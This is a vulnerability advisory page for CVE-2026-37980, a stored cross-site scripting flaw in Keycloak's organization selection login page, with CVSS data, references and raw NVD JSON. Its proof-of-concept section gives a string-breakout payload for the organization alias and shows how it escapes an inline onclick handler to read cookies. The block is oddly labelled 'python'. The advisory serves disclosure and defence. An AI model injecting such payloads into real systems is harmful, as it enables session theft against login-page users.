CVE-2026-37980

Description

A flaw was found in Keycloak, specifically in the organization selection login page. A remote attacker with `manage-realm` or `manage-organizations` administrative privileges can exploit a Stored Cross-Site Scripting (XSS) vulnerability. This flaw occurs because the `organization.alias` is placed into an inline JavaScript `onclick` handler, allowing a crafted JavaScript payload to execute in a user's browser when they view the login page. Successful exploitation enables arbitrary JavaScript execution, potentially leading to session theft, unauthorized account actions, or further attacks against users of the affected realm.

CVSS Details

CVSS Score

6.9

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Keycloak (具体受影响版本未在提供信息中明确列出)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!--
PoC Concept for CVE-2026-37980
Attacker sets the organization.alias to the following payload:
-->
');alert(document.cookie);//

<!--
Explanation:
The vulnerable code likely looks like:
<button onclick="selectOrganization('$ALIAS')">

When the payload is injected, it becomes:
<button onclick="selectOrganization('');alert(document.cookie);//')">

This breaks out of the string context and executes the alert.
-->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-37980
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-37980
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-37980/
[4] VulDB https://vuldb.com/cve/CVE-2026-37980
[5] https://access.redhat.com/security/cve/CVE-2026-37980
[6] https://bugzilla.redhat.com/show_bug.cgi?id=2455325

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-37980", "sourceIdentifier": "[email protected]", "published": "2026-04-14T15:16:34.230", "lastModified": "2026-04-17T15:11:03.923", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in Keycloak, specifically in the organization selection login page. A remote attacker with `manage-realm` or `manage-organizations` administrative privileges can exploit a Stored Cross-Site Scripting (XSS) vulnerability. This flaw occurs because the `organization.alias` is placed into an inline JavaScript `onclick` handler, allowing a crafted JavaScript payload to execute in a user's browser when they view the login page. Successful exploitation enables arbitrary JavaScript execution, potentially leading to session theft, unauthorized account actions, or further attacks against users of the affected realm."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-37980", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2455325", "source": "[email protected]"}]}}